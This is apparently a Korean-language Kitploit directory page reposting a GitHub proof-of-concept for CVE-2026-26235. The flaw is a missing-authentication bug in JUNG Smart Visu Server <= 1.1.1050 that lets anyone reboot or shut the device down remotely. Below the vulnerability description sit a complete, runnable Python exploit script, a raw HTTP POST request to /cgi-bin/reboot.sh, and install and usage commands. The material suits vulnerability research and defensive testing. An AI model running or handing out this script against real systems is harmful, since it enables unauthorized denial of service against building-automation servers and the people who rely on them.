Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown — # CVE-2026-26235 개념 증명 익스플로잇 JUNG Smart Visu Server <=1.1.1050의 인증되지 않은 서비스 거부(DoS) 취약점에 대한 개념 증명 익스플로잇으로, 노출된 CGI 엔드포인트를 통해 원격 재부팅 또는 종료를 허용합니다. | Kitploit
도구/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

# CVE-2026-26235 개념 증명 익스플로잇 JUNG Smart Visu Server <=1.1.1050의 인증되지 않은 서비스 거부(DoS) 취약점에 대한 개념 증명 익스플로잇으로, 노출된 CGI 엔드포인트를 통해 원격 재부팅 또는 종료를 허용합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
227개월 전아직 검토되지 않음

👤 작성자

Mohammed Idrees Banyamer

  • 📍 국가: 요르단
  • 📸 인스타그램: @banyamer_security

Python Version CVE CVSS CWE Author

CVE-2026-26235에 대한 개념 증명(PoC) 익스플로잇 - JUNG Smart Visu Server ≤ 1.1.1050의 인증 누락으로 인한 비인증 서비스 거부(DoS) 취약점.


🚨 취약점 설명

CVE-2026-26235는 JUNG Smart Visu Server 버전 ≤ 1.1.1050에서 발생하는 비인증 서비스 거부(DoS) 취약점입니다. 이 제품은 중요한 시스템 관리 기능에 대한 인증을 구현하지 않아, 원격 공격자가 단일 POST 요청만으로 서버를 재부팅하거나 종료시킬 수 있습니다.

/cgi-bin/reboot.sh 및 /cgi-bin/shutdown.sh 엔드포인트는 인증 검사 없이 노출되어 있습니다. 이러한 시스템 수준 명령을 실행하는 데 세션 토큰, API 키 또는 자격 증명이 필요하지 않습니다.

이로 인해 다음이 가능합니다:

  • 비인증 시스템 재부팅/종료
  • 사용자 상호작용 불필요
  • 완전한 서비스 중단
  • 지속적인 서비스 거부(DoS)

🎯 영향을 받는 버전

상태버전
❌ 취약JUNG Smart Visu Server ≤ 1.1.1050
✅ 패치됨아직 출시되지 않음

테스트 환경: JUNG Smart Visu Server 1.1.1050, Embedded Linux


💥 영향

벡터설명
CVSS v48.7 (높음) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
인증없음 - 완전히 비인증
공격 벡터네트워크
복잡도낮음
영향높은 가용성 영향

🔬 기술적 세부 사항

근본 원인

  1. 인증 누락 - CWE-306: 제품이 중요한 시스템 기능에 대해 어떠한 인증도 수행하지 않음
  2. 노출된 CGI 엔드포인트 - /cgi-bin/reboot.sh 및 /cgi-bin/shutdown.sh가 공개적으로 접근 가능
  3. 세션 검증 없음 - 쿠키, 토큰 또는 자격 증명 검증이 발생하지 않음
  4. 직접적인 시스템 명령 실행 - CGI 스크립트가 권한 검사 없이 시스템 재부팅/종료 명령을 실행

취약점 흐름

공격자 → POST /cgi-bin/reboot.sh → 인증 검사 없음 → 시스템 재부팅 → DoS
공격자 → POST /cgi-bin/shutdown.sh → 인증 검사 없음 → 시스템 종료 → DoS

🛠️ 개념 증명(PoC)

Python 익스플로잇 스크립트

#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()

원시 HTTP 요청

POST /cgi-bin/reboot.sh HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Origin: http://192.168.1.100:8080
Referer: http://192.168.1.100:8080/
DNT: 1
Sec-GPC: 1
Content-Length: 0


📦 설치

git clone https://github.com/banyamer-security/CVE-2026-26235.git
cd CVE-2026-26235
pip install requests
chmod +x CVE-2026-26235.py

🚀 사용법

기본 재부팅

python3 CVE-2026-26235.py https://192.168.1.100:8080
도구 다운로드